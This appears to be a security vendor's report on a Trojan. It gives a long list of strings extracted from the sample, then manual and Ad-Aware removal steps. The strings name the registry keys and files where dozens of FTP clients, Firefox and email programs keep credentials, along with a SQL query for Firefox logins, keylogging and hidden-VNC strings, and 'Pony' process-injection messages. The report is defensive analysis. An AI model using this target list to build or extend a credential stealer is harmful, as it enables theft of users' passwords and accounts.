Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
&.ipO
;&;,;3;^;
:$:,:7:?:
9”9C9
.pdata
@.reloc
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
regsvr32.exe:3320
%original file name%.exe:2448 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\ProgramData\LibxaJximb\QamzEsom.ijv (1425 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~004D627B.tmp (286 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"LibxaJximb" = "regsvr32.exe C:\ProgramData\LibxaJximb\QamzEsom.ijv" - Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.